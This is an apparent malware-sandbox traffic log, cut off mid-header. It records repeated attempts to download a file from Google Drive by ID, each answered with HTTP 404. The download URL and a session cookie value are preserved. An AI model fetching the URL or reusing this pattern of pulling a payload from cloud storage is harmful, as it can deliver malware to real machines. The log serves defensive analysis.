      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficHTTP traffic detected: GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTYurtJE-J8abv72OPbQC7EpGzekbbDHoqZf86aKBNOVd6j5mPUos2w7Z4qhWNGZBLVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:08:51 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-H2F3BWaFKNraajirQZouaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU; expires=Sun, 13-Jul-2025 02:08:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS4ryeFUyhwFjuOpt6QYUDgjoJi2VBccicqu5ufWYumIdgroJUCSj8mM19r44ZVx4k1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:08:53 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-U86fOgIHl5pQjiCls8rkPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRqF2IYrqX7cDZUoXqxfCyMv2WOiCJjvTb1rg5ymgcQsaObGM9uFj1TbuhxWhkX98EfD04dlYQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:08:55 GMTContent-Security-Policy: script-src 'nonce-mXOwVsDROoX8Z-deesKbMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6O_xi4eK0zYRESZytb29lZeZvY-qdXFCl6Zq1OlDyhx41r-2L-gopBxSuPSfk-5BhkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:08:58 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-GQ0bSoF1BR3qls8a4lx-lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC750KnAA9VlVDqhnFQF1NlRG2LXgwFCaiEhIttJscnGJYEfwbhNr-GcmZJ3LPXyqtCIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:00 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-hLedHVU96__ZeWHD_hLiWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ-tKfMRuEQdnnFF7QRIVOa_P6icTjTqG5Ml-qicHRe_KMt9WkNN07-qK1i3wOQcXAra79gCtEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:02 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-HaRabD7Fy40heglCo9695Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSFiTvrky_OPF3K2xPo35YnJ1wssKCZQNAhQwvoI04yWOPVgJ0yoDVdZb2MX6ux4ZM7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:05 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-X6e-y3LR0GferA64o65Gaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSmBxuVFba_G4a6WzZ25kMXng3pWzsd6ys_JxET9QLqaRWh7ekzExVgCKaIs6GYUq5GgTZR0hoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ZRQUhTXXa02TxOkI58e7YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQoLyRS-oHiXpoR-g1-L-qKmBl47C5EWq_XcAWQcCaeMrxPDUk9D6ED7V5Slzvkpf-fY6aklD4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:10 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-bFacEBQz5V1q2gFCLXxOlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTIA-DAD5ppr2Ew3ud8I1TasNDxcu57noXqm06gXL9frYRWPnD28npAj0goAJY_SHSrU5sQNLYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:12 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-a_T3o6AIl95uqzSDAnQTKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRz0BZ16If8xH-NhFrbrc1_6R2IGeavS6YAiLSlCAa1djZsm5nANo5CcPkX7yF2clHLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:14 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-CxU-PktmcSjKlemqmuCGzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgScc9gfCOBOp-bO5kD6x936NuwmP0KNjRIJuiPBHC2lwUlcJ1WdB4zKYdynfBJjj_xZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-B8QuXgxITK5E3kt4cGdvzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQSvy0PWNCj3iEBmRNcR1lBwLRMjoa1-js4iGrdwzFfD35LRkARjDRNqMV_AyhXiiYRCvmwSBYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:19 GMTContent-Security-Policy: script-src 'nonce-J-AJO7s5GtBWLiEISVe_Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: 